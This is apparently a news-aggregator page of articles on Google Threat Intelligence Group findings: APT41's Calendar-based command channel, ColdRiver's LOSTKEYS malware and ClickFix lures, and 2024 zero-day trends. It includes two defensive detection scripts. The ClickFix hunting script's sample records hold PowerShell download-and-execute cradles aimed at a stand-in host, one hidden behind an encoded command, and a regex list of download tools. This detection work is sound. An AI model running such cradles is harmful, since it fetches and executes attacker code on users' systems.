
Latest news with #GTIG

Google uncovers malware campaign by China-linked hackers using Calendar events in a sophisticated cyberattack

Mint
3 days ago

Google's Threat Intelligence Group (GTIG) has found that a China-linked group used Google Calendar as the command-and-control channel for malware that stole data from targeted individuals. The group, tracked as APT41 (also known as HOODOO), is believed to have ties to the Chinese government.

According to GTIG, the attack began with spear phishing: carefully crafted emails sent to specific targets. Each email carried a link to a ZIP file hosted on a compromised government website. Inside the archive the victim found a shortcut (LNK) file disguised as a PDF and a folder of images of insects and spiders. Two of the "images" were not images at all but carried the malicious code. Opening the shortcut launched the malware, and the shortcut then replaced itself with a decoy PDF about species export regulations so that nothing looked amiss.

The malware ran in three stages. First, it decrypted and executed a component named PLUSDROP in memory rather than writing it to disk. Second, it injected the next stage into a legitimate Windows process so that the malicious code ran under a trusted process name. Third, a component called TOUGHPROGRESS executed the attackers' commands and exfiltrated data.

What set this campaign apart was its use of Google Calendar as the command channel. TOUGHPROGRESS created zero-minute events on specific dates and placed encrypted data or instructions in the event description field. The implant periodically read the calendar for new events carrying operator commands, executed them, and wrote the results back as another calendar event for the operator to collect. Because this traffic is TLS to a legitimate Google service, it blends in with ordinary web activity; blocking the destination is not a practical control, so detection has to rest on host behaviour and on the shape of the calendar activity itself.

Google said it first spotted the campaign in October 2024, when it found malware being served from a compromised government website. It has since shut down the Calendar accounts used by the attackers and dismantled other parts of their infrastructure.

To blunt similar attacks, Google has updated its malware-detection systems and blocked the malicious sites involved. It also notified organisations that may have been affected and shared technical details so they could investigate and respond.
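A hunt for the calendar pattern described above, as an added example that is not Google's or GTIG's code: a Python script that scans events in the shape returned by the Google Calendar API (the `items` array of `events.list`) and flags the TOUGHPROGRESS signature, a zero-minute event whose description is an opaque encoded blob rather than readable text. The `SAMPLE_EVENTS` records are constructed here for the example; the base64 blob is generated locally and is not real campaign data. The thresholds (32-character minimum, fewer than 80% printable bytes after decoding) are assumptions to tune, not values from the report.

```python
"""Hunt a calendar for zero-minute events carrying opaque (encoded) payloads.

Added example, not Google's or GTIG's code. Input is a list of event dicts in
the shape of the Google Calendar API v3 `events.list` response (`items`).
"""
import base64
import math
import re
from datetime import datetime

# Constructed stand-in for the encrypted blob an implant would post: 96 bytes of
# deterministic keystream-looking data, base64-encoded. Not real campaign data.
C2_BLOB = base64.b64encode(bytes((i * 37 + 11) & 0xFF for i in range(96))).decode()

# Constructed sample events (assumed shape of the API response, fields trimmed).
SAMPLE_EVENTS = [
    {"id": "evt-1", "summary": "Weekly sync",            # ordinary 30-minute meeting
     "description": "Agenda: Q2 roadmap, hiring update.",
     "start": {"dateTime": "2025-05-12T09:00:00Z"},
     "end": {"dateTime": "2025-05-12T09:30:00Z"}},
    {"id": "evt-2", "summary": "",                       # zero minutes + opaque blob
     "description": C2_BLOB,
     "start": {"dateTime": "2025-05-12T00:00:00Z"},
     "end": {"dateTime": "2025-05-12T00:00:00Z"}},
    {"id": "evt-3", "summary": "Dentist",                # zero minutes but readable text
     "description": "Reminder: bring insurance card",
     "start": {"dateTime": "2025-05-13T14:00:00Z"},
     "end": {"dateTime": "2025-05-13T14:00:00Z"}},
    {"id": "evt-4", "summary": "Offsite",                # all-day event, no dateTime
     "description": "",
     "start": {"date": "2025-06-01"},
     "end": {"date": "2025-06-02"}},
]

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _parse(ts):
    # The API returns RFC 3339; fromisoformat() on older Pythons rejects a bare 'Z'.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def event_duration_minutes(event):
    """Minutes between start and end, or None for all-day ('date') events."""
    start, end = event.get("start", {}), event.get("end", {})
    if "dateTime" not in start or "dateTime" not in end:
        return None
    return (_parse(end["dateTime"]) - _parse(start["dateTime"])).total_seconds() / 60


def shannon_entropy(text):
    """Bits per character; base64 of ciphertext sits well above English prose."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_opaque(text, min_len=32, max_printable=0.8):
    """True if text is a single base64 token whose decoded bytes are mostly non-printable.

    Readable text fails the base64 regex (spaces, punctuation); base64 of plain
    ASCII decodes to printable bytes and is also rejected. Thresholds are assumptions.
    """
    text = (text or "").strip()
    if len(text) < min_len or len(text) % 4 or not _B64_RE.match(text):
        return False
    raw = base64.b64decode(text)
    printable = sum(32 <= b < 127 for b in raw) / len(raw)
    return printable < max_printable


def hunt_calendar_c2(events):
    """Return findings for events that are both zero-minute and carry an opaque description."""
    findings = []
    for ev in events:
        desc = ev.get("description", "")
        reasons = []
        if event_duration_minutes(ev) == 0:
            reasons.append("zero-minute event")
        if looks_opaque(desc):
            reasons.append(f"opaque base64 description ({len(desc)} chars, "
                           f"{shannon_entropy(desc):.2f} bits/char)")
        if len(reasons) == 2:  # either signal alone is too noisy on a real calendar
            findings.append({"id": ev["id"], "start": ev["start"].get("dateTime"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt_calendar_c2(SAMPLE_EVENTS):
        print(finding)
```

Only evt-2 is reported: evt-3 is zero-minute but human-readable, and a readable description encoded as base64 would decode to printable bytes and pass. On a real tenant, feed the script the `items` array pulled for each user's calendar and expect some tuning; integrations that stash opaque identifiers in descriptions are the main source of false positives, and an all-zero payload would also be flagged because the check is a heuristic, not a decryptor.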

Google exposes new Russian spyware virus LostKeys linked to FSB

Yahoo
11-05-2025

Google has announced (via Android Headlines) the discovery of new Russian spyware called LostKeys, used by the ColdRiver group, which is linked to the Russian Federal Security Service (FSB). The malware is built to steal files and system data from Western organisations.

Source: Mezha Media, a technology and IT news platform within Ukrainska Pravda's holding company.

Details: The Google Threat Intelligence Group (GTIG) reports that LostKeys is delivered through targeted ClickFix attacks, a social-engineering technique that opens with a fake CAPTCHA page. Victims are tricked into running a malicious PowerShell script themselves, and that script downloads and executes further stages; the ultimate aim is to install LostKeys. Once running, LostKeys works like a digital vacuum cleaner, collecting files, directory listings and system information. The group also deploys other malware, notably SPICA, to retrieve documents.

ColdRiver has been active since 2017 and is also tracked as Star Blizzard and Callisto Group. It has reportedly become more active in recent years, especially since Russia's invasion of Ukraine. The group specialises in cyber-espionage against government and defence institutions, think tanks, politicians, journalists and non-governmental organisations. The United States has sanctioned individual members and offered a US$10 million reward for information leading to their arrest.

Google's experts urge organisations that are plausible ColdRiver targets to strengthen their defences, recommending Google's Advanced Protection Program and keeping security systems up to date.
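A host-side hunt for the ClickFix launch described above, as an added example that is not GTIG's or Google's detection logic. It scans process-creation records in the shape of Sysmon Event ID 1 for PowerShell started by explorer.exe, which is what a command pasted into the Win+R Run box looks like, combined with a download-and-execute cradle, including one hidden behind `-EncodedCommand`. The records, the `captcha-verify.example` host and both command lines are constructed for the example; the assumption that the victim pastes the command into the Run box is the common ClickFix delivery, not something the article states.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not GTIG's code. Records follow the Sysmon Event ID 1 field
names (Image, ParentImage, CommandLine); the samples below are constructed.
"""
import base64
import re


def encode_command(script):
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE), as an attacker would."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed Sysmon Event ID 1 style records (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"RecordId": 1,  # admin running a script from a terminal: parent is cmd.exe
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"RecordId": 2,  # pasted into Win+R after a fake CAPTCHA: parent is explorer.exe
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://captcha-verify.example/check' -UseBasicParsing)\""},
    {"RecordId": 3,  # same delivery, cradle hidden behind -enc (assumed host name)
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "pwsh -nop -ep bypass -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('https://captcha-verify.example/s1.ps1')")},
    {"RecordId": 4,  # interactive PowerShell opened from the Start menu, nothing suspicious
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run box and Start menu launches
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|"
    r"downloadstring|downloadfile|downloaddata|start-bitstransfer|curl|wget)\b", re.I)
EVASION_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecution)?p(olicy)?\s+bypass", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none (or it is malformed)."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process_event(ev):
    """Reasons this record looks like a ClickFix launch; empty list means clean."""
    if _basename(ev["Image"]) not in POWERSHELL:
        return []
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    # Search the decoded script when there is one; the base64 itself is noise.
    haystack = cmd if decoded is None else decoded
    interactive = _basename(ev["ParentImage"]) in INTERACTIVE_PARENTS
    cradle = CRADLE_RE.search(haystack)
    # Require delivery vector AND cradle; evasion switches alone are too noisy to page on.
    if not (interactive and cradle):
        return []
    reasons = [f"powershell spawned by {_basename(ev['ParentImage'])} (Run box or pasted command)",
               f"download/execute cradle: {cradle.group(1)}"]
    if decoded is not None:
        reasons.append(f"decoded -EncodedCommand: {decoded}")
    if EVASION_RE.search(cmd):
        reasons.append("hidden window / no-profile / execution-policy-bypass switches")
    return reasons


def hunt_clickfix(events):
    """Map RecordId -> reasons for every record that matches the ClickFix pattern."""
    hits = {}
    for ev in events:
        reasons = analyze_process_event(ev)
        if reasons:
            hits[ev["RecordId"]] = reasons
    return hits


if __name__ == "__main__":
    for record_id, reasons in hunt_clickfix(SAMPLE_PROCESS_EVENTS).items():
        print(record_id, reasons)
```

Records 2 and 3 are reported; record 1 has the cradle-free script launch an administrator would expect and record 4 is a bare interactive shell. The explorer.exe parent is the discriminating signal: scripted or scheduled PowerShell almost never has it, so the rule stays quiet on automation while catching the one thing ClickFix needs, a human running the attacker's command.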

Google uncovers "LOSTKEYS" malware linked to Russian-backed Cold River hackers

Mint, Politics
07-05-2025

Google has uncovered a new strain of malware, dubbed "LOSTKEYS", believed to be the work of Cold River, a Russian-aligned hacking group reportedly connected to the country's Federal Security Service (FSB), Reuters reported.

According to a blog post published on Wednesday by Google's Threat Intelligence Group (GTIG), the newly identified malware marks a significant step in Cold River's capabilities. LOSTKEYS is designed to steal files and send system information back to its operators, expanding the group's known espionage toolkit. Wesley Shields, a researcher at GTIG, said the malware signals "a new development in the toolset" used by the group, which has a history of targeting politically and strategically sensitive entities.

Cold River, known under several other aliases, has been linked to earlier operations against high-profile Western individuals and institutions. Its primary mission, experts say, is collecting intelligence that serves Russian geopolitical interests. Google's tracking shows that between January and April 2025 Cold River targeted current and former advisers to Western governments and militaries; other victims reportedly included journalists, international think tanks, non-governmental organisations and individuals associated with Ukraine.

The Russian embassy in Washington had not responded to requests for comment.

Cold River has previously drawn attention for audacious operations. In mid-2022 the group was accused of targeting three nuclear research facilities in the United States, and later that year it was implicated in the leak of private emails belonging to former British intelligence chief Sir Richard Dearlove and others associated with pro-Brexit activity.

Security analysts warn that the emergence of LOSTKEYS underscores a broader escalation in cyber-espionage tactics by state-linked actors. Google has urged targeted organisations and individuals to stay vigilant and adopt up-to-date security measures.

Enterprise Security In The Crosshairs: Google Reveals Key Zero-Day Exploitation Trends For 2024

Scoop, Business
01-05-2025

Press Release: Google Threat Intelligence Group (GTIG)

The Google Threat Intelligence Group (GTIG) has released its latest annual analysis of zero-day vulnerabilities, revealing a shift in attacker focus toward enterprise technologies, while overall zero-day exploitation remains on an upward trend.

In its report "Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis", GTIG tracked 75 zero-day vulnerabilities exploited in the wild last year. That figure is down from 98 in 2023 but remains above the 63 recorded in 2022, continuing a four-year trend of gradual growth.

GTIG defines a zero-day as a software vulnerability that is exploited in the wild before the affected vendor has released a patch. These flaws are prized by both nation-state actors and financially motivated criminals because exploiting them is quiet and the access they grant is broad.

Enterprise Tech in the Firing Line

2024 saw a marked rise in zero-day exploitation of enterprise-focused technologies: security software, network appliances and business infrastructure tools. GTIG found that 44% of all tracked zero-days in 2024 targeted enterprise technologies, up from 37% in 2023.

"Security and networking products are emerging as prime targets because of the far-reaching access they offer," the report states. Twenty of the 33 enterprise-focused vulnerabilities identified in 2024 were in these categories, including widely used platforms from Ivanti, Palo Alto Networks and Cisco.

While the absolute number of exploited enterprise vulnerabilities dropped slightly from the previous year, the proportional increase points to a deeper trend: attackers are prioritising systems that offer broad access and limited monitoring, in particular appliances on which endpoint detection tools cannot be deployed or are ineffective.

Browsers and Mobiles See Decline

By contrast, zero-day exploitation of browsers fell by about a third and of mobile devices by about half. Among browsers, Chrome remained the most frequently exploited, and Android devices continued to be compromised through flaws in third-party components.

Microsoft Windows, however, saw exploitation continue to rise, with 22 zero-days tracked in 2024, up from 16 in 2023 and 13 in 2022. GTIG expects Windows to remain a persistent target given its dominance across home and business environments.

Espionage Remains a Driving Force

Of the 75 zero-days tracked, GTIG was able to attribute 34 to specific threat actors. Over half of these (18) were tied to espionage, either by nation-state groups or by customers of commercial surveillance vendors (CSVs). Chinese state-backed groups were linked to five exploits, focused almost exclusively on security and networking devices, while North Korean actors matched that number for the first time, mixing espionage with financially motivated activity. Forensic tools from vendors such as Cellebrite were linked to chains of zero-day exploits that require physical access to a mobile device, reinforcing concerns about the misuse of commercial spyware and forensic technology.

Financial Motivation Still Present

Although espionage dominates the attributed set, financially motivated actors also played a notable role. The suspected FIN11 cluster, for example, was linked to multiple attacks on enterprise file-transfer systems, using zero-days for data theft and extortion.

A Call for Greater Vendor Vigilance

Some historically popular targets saw fewer attacks in 2024, but the report stresses that this is not necessarily a sign of safety. It may instead reflect the growing effectiveness of vendor mitigations and a redirection of attacker effort toward areas with weaker defences.

"Attackers continue to exploit well-known classes of vulnerabilities—such as command injection, use-after-free, and cross-site scripting—highlighting the need for stronger coding standards and preventative practices," GTIG said.

With enterprise vendors now more often in the crosshairs, Google urges all technology providers to raise their security posture, especially those whose products sit at the centre of business infrastructure.

The full report, including in-depth technical analysis and recommendations for defenders, is available on the Google Threat Intelligence blog. A companion webinar is scheduled for later this month.

Government hackers are leading the use of attributed zero-days, Google says

Yahoo
01-05-2025

Hackers working for governments were responsible for the majority of attributed zero-day exploits used in real-world cyberattacks last year, according to new research from Google.

Google's report says the number of zero-day exploits, meaning security flaws that were unknown to the software makers at the time hackers abused them, fell from 98 in 2023 to 75 in 2024. But of the zero-days Google could attribute, that is, where it could identify the hackers responsible for exploiting them, at least 23 were linked to government-backed hackers.

Among those 23, 10 zero-days were attributed to hackers working directly for governments, including five linked to China and another five to North Korea. A further eight were identified as having been developed by spyware makers and surveillance enablers, such as NSO Group, which typically claim to sell only to governments. In those eight, Google also counts bugs recently exploited by Serbian authorities using Cellebrite phone-unlocking devices.

Even with eight recorded cases of zero-days developed by spyware makers, Clément Lecigne, a security engineer at Google Threat Intelligence Group (GTIG), told TechCrunch that those companies "are investing more resources in operational security to prevent their capabilities being exposed and to not end up in the news."

Google added that surveillance vendors continue to proliferate. "In instances where law enforcement action or public disclosure has pushed vendors out of business, we've seen new vendors arise to provide similar services," James Sadowski, a principal analyst at GTIG, told TechCrunch. "As long as government customers continue to request and pay for these services, the industry will continue to grow."

The remaining 11 attributed zero-days were likely exploited by cybercriminals, such as ransomware operators targeting enterprise devices including VPNs and routers.

The report also found that the majority of the 75 zero-days exploited in 2024 targeted consumer platforms and products such as phones and browsers, while the rest hit devices typically found on corporate networks.

The good news, according to the report, is that software makers are making it harder for exploit developers to find bugs. "We are seeing notable decreases in zero-day exploitation of some historically popular targets such as browsers and mobile operating systems," the report says. Sadowski specifically pointed to Lockdown Mode, a feature of iOS and macOS that disables certain functionality to harden phones and computers and which has a proven track record of stopping government hackers, as well as Memory Tagging Extension (MTE), a security feature of modern Google Pixel chipsets that helps detect certain classes of memory-safety bugs.

Reports like Google's are valuable because they give the industry, and observers, data points on how government hackers operate. The inherent caveat is that counting zero-days undercounts by nature: some exploitation goes undetected, and of what is detected, some is never attributed.
